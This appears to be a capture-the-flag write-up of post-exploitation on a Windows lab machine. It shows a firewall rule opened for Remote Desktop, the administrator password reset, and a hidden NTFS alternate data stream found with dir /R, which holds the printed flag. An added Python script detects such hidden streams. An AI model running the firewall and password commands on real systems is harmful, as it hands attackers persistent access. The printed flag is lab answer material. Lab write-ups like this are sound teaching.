Beyond


This is the "Beyond" page, where additional post-exploitation enumeration and assessment are carried out as SYSTEM after the target system has been compromised.

c:\windows\system32> cmd /c netsh firewall add portopening TCP 3389 "Remote Desktop"
 
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .
 
Ok.
 
 
c:\windows\system32> NET USER administrator Qwer1234  
The command completed successfully.

Flag


C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1
 
 Directory of C:\Users\Administrator\Desktop
 
11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,329,575,424 bytes free
 
C:\Users\Administrator\Desktop> type hm.txt
The flag is elsewhere.  Look deeper.

The usual root.txt file is nowhere to be found in the C:\Users\Administrator\Desktop directory. Instead, there is a file claiming that the flag is elsewhere.

C:\Users\Administrator\Desktop> dir /R
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1
 
 Directory of C:\Users\Administrator\Desktop
 
11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,329,382,912 bytes free

Listing the directory with dir /R, which also shows alternate data streams, reveals one: hm.txt:root.txt:$DATA

The term Alternate Data Stream (ADS) refers to additional streams of data associated with a file. Alternate data streams are a feature of the NTFS (New Technology File System) file system used in Windows. It allows more than one data stream to be associated with a filename (a fork), using the format filename:streamname (e.g., text.txt:extrastream). A plain dir listing does not show them, and their size is not included in the File(s) byte total, which is why the 34-byte stream above is invisible without the /R switch.

C:\Users\Administrator\Desktop> more < hm.txt:root.txt:$DATA
afbc5bd4b615a60648cec41c6ac92530
 
C:\Users\Administrator\Desktop> more < hm.txt:root.txt 
afbc5bd4b615a60648cec41c6ac92530

Using input redirection (<) to feed the stream to more, one can read the alternate data stream; the explicit :$DATA stream-type suffix is optional, as the two commands above show.
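As an added example (not part of the original write-up), the following Python script parses saved "dir /R" output such as the listing above and reports every file that carries a named stream, together with the bytes that the plain "dir" File(s) total leaves out. The sample listing is the Desktop listing from this page with one constructed Zone.Identifier entry added to exercise a file name containing spaces.

```python
import re
from collections import defaultdict

# Entry printed by `dir /R` for a named stream: size, then name:stream:$DATA,
# with no date/time columns in front of it.
STREAM_RE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:\\]+):\$DATA\s*$")
# Ordinary entry: date, time, <DIR> or size, then the file name.
ENTRY_RE = re.compile(r"^\d{2}/\d{2}/\d{4}\s+\d{2}:\d{2} [AP]M\s+(<DIR>|[\d,]+)\s+(.+?)\s*$")

# Constructed sample: the Desktop listing from this write-up plus one made-up
# Zone.Identifier stream on the .lnk file, to exercise a name with spaces.
SAMPLE_LISTING = r"""
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\Users\Administrator\Desktop

11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
                                    26 Windows 10 Update Assistant.lnk:Zone.Identifier:$DATA
               2 File(s)            833 bytes
               2 Dir(s)   2,329,382,912 bytes free
"""

def find_alternate_streams(listing):
    """Map each file name to its named streams as (stream name, size) pairs."""
    streams = defaultdict(list)
    for line in listing.splitlines():
        m = STREAM_RE.match(line)
        if m:
            size, name, stream = m.groups()
            streams[name].append((stream, int(size.replace(",", ""))))
    return dict(streams)

def hidden_bytes(listing):
    """Bytes held in named streams; plain `dir` leaves them out of its File(s) total."""
    return sum(size for entries in find_alternate_streams(listing).values()
               for _, size in entries)

def describe(listing):
    """One report line per file that carries a named stream."""
    sizes = {m.group(2): m.group(1) for m in map(ENTRY_RE.match, listing.splitlines()) if m}
    return [f"{name} ({sizes.get(name, '?')} bytes) hides {len(entries)} stream(s): "
            + ", ".join(f"{s} ({n} bytes)" for s, n in entries)
            for name, entries in find_alternate_streams(listing).items()]
```

Running describe(SAMPLE_LISTING) yields one line per file with a named stream, and hidden_bytes(SAMPLE_LISTING) gives the stream bytes missing from the 833-byte total.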

Scheduled Tasks


Only the default scheduled tasks are present.

Services